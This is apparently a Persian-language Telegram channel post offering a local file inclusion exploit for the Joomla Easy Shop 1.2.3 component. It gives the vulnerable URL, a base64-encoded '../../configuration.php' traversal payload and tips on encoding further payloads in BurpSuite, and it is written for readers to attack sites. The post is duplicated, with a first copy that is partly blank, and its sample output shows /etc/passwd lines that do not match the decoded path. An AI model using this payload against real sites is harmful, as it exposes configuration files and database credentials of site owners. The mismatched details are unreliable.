💠🌐🌀
🔰⚜️
💢
#Joomla (Joomla!) #Component #EasyShop (Easy Shop) v 1.2.3 #LFI Local File Inclusion #Vulnerable
➖➖➖➖➖➖➖➖
آسیب پذیری LFI در کامپوننته Easy Shop جوملا :
#~Exploit Title :
〰〰〰〰
#~Path :
آدرسی باگ :
〰〰〰〰
#~Exploit :
نحوه ی اکسپلویت :
== > برای اینکه اکسپلویت اجرا بشه باید دستورات رو بصورت کاراکتر های Base64 انکود کنید و به اخر url اضافه کنید
مانند :
`/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA=`
اگر قسمت انکود شده را دیکود کنیم برابر با عبارت زیر میشود :
بخشی از پاسخی که سایت برای ما برمیگردونه :
`root:x:0:0:root:/root:/bin/bash`
〰〰〰〰
برای اینکه بتوانید دستورات خودتون را انکود کنید بهترین راه استفاده از BurpSuite است.(در تب Decoder )
〰〰〰〰
Software Link
➖➖➖➖➖➖➖➖
⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
🔰⚜️
💢
#Joomla (Joomla!) #Component #EasyShop (Easy Shop) v 1.2.3 #LFI Local File Inclusion #Vulnerable
➖➖➖➖➖➖➖➖
آسیب پذیری LFI در کامپوننته Easy Shop جوملا :
#~Exploit Title :
Joomla! Component Easy Shop 1.2.3 - Local File Inclusion
〰〰〰〰
#~Path :
آدرسی باگ :
http://localhost/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=
〰〰〰〰
#~Exploit :
نحوه ی اکسپلویت :
== > برای اینکه اکسپلویت اجرا بشه باید دستورات رو بصورت کاراکتر های Base64 انکود کنید و به اخر url اضافه کنید
مانند :
`/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA=`
اگر قسمت انکود شده را دیکود کنیم برابر با عبارت زیر میشود :
../../configuration.php
بخشی از پاسخی که سایت برای ما برمیگردونه :
`root:x:0:0:root:/root:/bin/bash`
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
〰〰〰〰
برای اینکه بتوانید دستورات خودتون را انکود کنید بهترین راه استفاده از BurpSuite است.(در تب Decoder )
〰〰〰〰
Software Link
➖➖➖➖➖➖➖➖
⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
Telegram
AttachLearnExploit